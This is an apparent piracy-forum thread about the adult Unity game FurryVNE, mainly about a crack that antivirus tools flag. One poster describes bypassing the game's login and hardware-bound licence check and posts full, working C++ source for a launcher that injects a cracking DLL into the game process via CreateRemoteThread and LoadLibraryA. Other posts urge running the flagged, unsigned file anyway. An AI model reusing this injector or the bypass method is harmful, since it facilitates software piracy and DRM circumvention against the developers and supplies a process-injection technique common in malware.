Unity FurryVNE [2024-11-09] [FurryVNE Team]

4.00 star(s) 11 Votes

SugarDuckling

Member
Nov 9, 2020
106
153
198
So does this game have a scene browser like yiffalicious?
Yes.

And is the character creator still awful?
Depends what you expect going in. It isn't a character creator like those you find in video games, but then again it's a lot more featured too. It's way easier to use than 3D software.

People are really creative with it:
 

jimmych0nga

Newbie
May 7, 2020
91
76
28
is there a crack that doesn't trip the AV of my computer, or get a warning message from F95 itself? I may find it, I'm browsing through the newer pages.

edit: looks like nope, still 4-5 detected viruses by F95 itself even. I don't wanna play this game without VR support anyway, so I will identify as both non-buynary and also non-piracy for now lol
I will make due with YF1 and the super outdated YF2 install I have kicking around.
 
Last edited:
  • Haha
Reactions: strong_p4ssword

npomme

Active Member
Nov 20, 2020
502
866
169
is there a crack that doesn't trip the AV of my computer, or get a warning message from F95 itself? I may find it, I'm browsing through the newer pages.

edit: looks like nope, still 4-5 detected viruses by F95 itself even. I don't wanna play this game without VR support anyway, so I will identify as both non-buynary and also non-piracy for now lol
I will make due with YF1 and the super outdated YF2 install I have kicking around.
detection are heuristics by the worst AV engine on this planet they probably flag my code as a virus because i silently write the licence file in your appdata folder instead of prompting you with a file explorer to make you browse to the location needed and save the file manually there while pausing all the game thread because timming is important the file need to exist before some function start to execute and also i need to hash some information of the account we used for bypassing login because AGAIN its not a true / false variable they have a true DRM not like VAM they do HMACS protocol and use your hardware footprint as a check of validity of the licence file

so as my crack doesnt have a "signed certificate" and write file in appdata and also import crypto lib ==> shitty detection because fuck you i asked for audit on my file a while ago but they dont care for shit
 

ssbbssc

Active Member
Dec 13, 2019
704
582
207
detection are heuristics by the worst AV engine on this planet they probably flag my code as a virus because i silently write the licence file in your appdata folder instead of prompting you with a file explorer to make you browse to the location needed and save the file manually there while pausing all the game thread because timming is important the file need to exist before some function start to execute and also i need to hash some information of the account we used for bypassing login because AGAIN its not a true / false variable they have a true DRM not like VAM they do HMACS protocol and use your hardware footprint as a check of validity of the licence file

so as my crack doesnt have a "signed certificate" and write file in appdata and also import crypto lib ==> shitty detection because fuck you i asked for audit on my file a while ago but they dont care for shit
i think the devs are asking stupid questions to lure out your method
 

jimmych0nga

Newbie
May 7, 2020
91
76
28
detection are heuristics by the worst AV engine on this planet they probably flag my code as a virus because i silently write the licence file in your appdata folder instead of prompting you with a file explorer to make you browse to the location needed and save the file manually there while pausing all the game thread because timming is important the file need to exist before some function start to execute and also i need to hash some information of the account we used for bypassing login because AGAIN its not a true / false variable they have a true DRM not like VAM they do HMACS protocol and use your hardware footprint as a check of validity of the licence file

so as my crack doesnt have a "signed certificate" and write file in appdata and also import crypto lib ==> shitty detection because fuck you i asked for audit on my file a while ago but they dont care for shit
As silly as it may sound, I'd prefer a virus that doesn't trip my AV, to a clean file that gives a false positive.

When doing counter hacks, the worst thing to do is incrementally fix what a hacker has broken, so the irony of us constantly telling you when it trips AV isn't lost on me, again as silly as that sounds.

It's not just the shitty F95 detector that trips, it's also microsoft, and malwarebytes. wacatac is no joke, no virus is but remote access tools triply no.

So if you can fix these things I will use your crack, obviously there's no onus on you, I'm just a random internet pirate :BootyTime:
 

npomme

Active Member
Nov 20, 2020
502
866
169
As silly as it may sound, I'd prefer a virus that doesn't trip my AV, to a clean file that gives a false positive.

When doing counter hacks, the worst thing to do is incrementally fix what a hacker has broken, so the irony of us constantly telling you when it trips AV isn't lost on me, again as silly as that sounds.

It's not just the shitty F95 detector that trips, it's also microsoft, and malwarebytes. wacatac is no joke, no virus is but remote access tools triply no.

So if you can fix these things I will use your crack, obviously there's no onus on you, I'm just a random internet pirate :BootyTime:
they moved to wacatac i think i'm gonna piss on myself DLL or the .exe because if its the .exe i think i 100% piss myself

thats the worst DLL injector ever wrote as i was tired and i wasn't wanting to take the 20 minutes to wrote a winhttp.dll proxy as i will not use this shit anymore because intel sucks dick here it is are you ready my son BEHOLD THE BIG BAD WACATAC VIRUS

C:
#include <windows.h>
#include <iostream>
#include <unordered_map>
#include <fstream>
#include <string>
// Function to inject DLL
bool InjectDLL(DWORD processID, const std::string& dllPath) {
    // Open the target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processID);
    if (hProcess == NULL) {
        std::cerr << "Failed to open target process." << std::endl;
        return false;
    }

    // Allocate memory in the target process for the DLL path
    void* pRemoteDllPath = VirtualAllocEx(hProcess, NULL, dllPath.size() + 1, MEM_COMMIT, PAGE_READWRITE);
    if (pRemoteDllPath == NULL) {
        std::cerr << "Failed to allocate memory in target process." << std::endl;
        CloseHandle(hProcess);
        return false;
    }

    // Write the DLL path into the allocated memory
    if (!WriteProcessMemory(hProcess, pRemoteDllPath, dllPath.c_str(), dllPath.size() + 1, NULL)) {
        std::cerr << "Failed to write DLL path into target process memory." << std::endl;
        VirtualFreeEx(hProcess, pRemoteDllPath, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return false;
    }

    // Get the address of LoadLibraryA in kernel32.dll
    HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
    if (hKernel32 == NULL) {
        std::cerr << "Failed to get handle of kernel32.dll." << std::endl;
        VirtualFreeEx(hProcess, pRemoteDllPath, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return false;
    }

    FARPROC pLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (pLoadLibraryA == NULL) {
        std::cerr << "Failed to get address of LoadLibraryA." << std::endl;
        VirtualFreeEx(hProcess, pRemoteDllPath, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return false;
    }

    // Create a remote thread in the target process to call LoadLibraryA with the DLL path as an argument
    HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryA, pRemoteDllPath, 0, NULL);
    if (hRemoteThread == NULL) {
        std::cerr << "Failed to create remote thread in target process." << std::endl;
        VirtualFreeEx(hProcess, pRemoteDllPath, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return false;
    }

    // Wait for the remote thread to finish
    WaitForSingleObject(hRemoteThread, INFINITE);

    // Cleanup
    VirtualFreeEx(hProcess, pRemoteDllPath, 0, MEM_RELEASE);
    CloseHandle(hRemoteThread);
    CloseHandle(hProcess);

    return true;
}

std::unordered_map<std::string, int> loadConfig(const std::string& filename) {
    std::unordered_map<std::string, int> config;
    std::ifstream file(filename);
    std::string line;

    if (!file) {
        std::cerr << "Error: Cannot open config file!\n";
        return config;
    }

    while (std::getline(file, line)) {
        size_t pos = line.find('=');
        if (pos != std::string::npos) {
            std::string key = line.substr(0, pos);
            int value = std::stoi(line.substr(pos + 1));
            config[key] = value;
        }
    }

    return config;
}
int main() {

//   Sleep(200);
    std::cout << "Preparing process for injection can take a while please be patient and do not touch anything!!" << std::endl;
    // Start the target process
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    if (!CreateProcess(L"FurryVNE.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        std::cerr << "Failed to start target process." << std::endl;
        return 1;
    }


    auto config = loadConfig("VNEConfig.txt");
    // Inject the DLL
    int sleeptime = 4000;
    if (config.find("timming-adjust") != config.end()) {
        sleeptime = config["timming-adjust"];
        std::cout << "timming-adjust: " << sleeptime << "ms\n";
      
    }
    else {
        std::cerr << "Key 'timming-adjust' not found in config!\n";
    }
    Sleep(sleeptime);
    std::cout << "injecting Black magic into process please wait !!" << std::endl;


    while (!InjectDLL(pi.dwProcessId, "VNEDLL.dll")) {
        std::cerr << "DLL injection failed retry in 500ms." << std::endl;
        return 1;
    }

    std::cout << "DLL injection successful." << std::endl;

    // Cleanup
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return 0;
}
for the DLL sadly i cant share the code without busting the people that help but the only detection i get on this is MaxSecure as a susgen
thats the crack for 23-03-2025 BTW :


but currently seem it doesnt work as expected...
 

npomme

Active Member
Nov 20, 2020
502
866
169
thx for the effort, cant wait to get the new version.
i'm kinda overworked AF i tried something yesterday sadly didnt work and i will probably dont have the time to tinker this week Maybe this weekend but they added shit to the check probably some new random hardware shit ID at this point i dont even know why they bother doing that
 

VT900000

Newbie
Dec 7, 2017
49
28
37
i'm kinda overworked AF i tried something yesterday sadly didnt work and i will probably dont have the time to tinker this week Maybe this weekend but they added shit to the check probably some new random hardware shit ID at this point i dont even know why they bother doing that
For the same reason AAA devs keep using DRM to their games despite knowing it will eventually be cracked. Their goal is not to stop piracy, its to protect the launch sales / buy them time.

It might not be hard to crack this game if you have the know how but currently you are the only one doing it and your time is limited. For them this is a success.
 

VT900000

Newbie
Dec 7, 2017
49
28
37
Yes.



Depends what you expect going in. It isn't a character creator like those you find in video games, but then again it's a lot more featured too. It's way easier to use than 3D software.

People are really creative with it:
Character creator in this game is actually very capable if you know how to use Blender and know shaders and texturing.
There many work arounds some of the limitations. I even managed to add outlines to characters using the inverse hull method.

There are some limitations that I haven't found any work around like eye textures. Many of the work arounds involve using the cloth system with currently can not have bones or fur.
Also they can require a lot of manual labor or make characters way harder to render.
 
Last edited:

npomme

Active Member
Nov 20, 2020
502
866
169
For the same reason AAA devs keep using DRM to their games despite knowing it will eventually be cracked. Their goal is not to stop piracy, its to protect the launch sales / buy them time.

It might not be hard to crack this game if you have the know how but currently you are the only one doing it and your time is limited. For them this is a success.
Yeah but i bet you 100$ that if someone that knows hmac and cryptography way better than me and also maybe has more knowledge about browser like the one they use in the game and this guy look at their bullshit 20 minutes he will produce way better way to crack that shit than my method that is really the shittiest way to crack that game
 
  • Like
Reactions: Neropharaoh
4.00 star(s) 11 Votes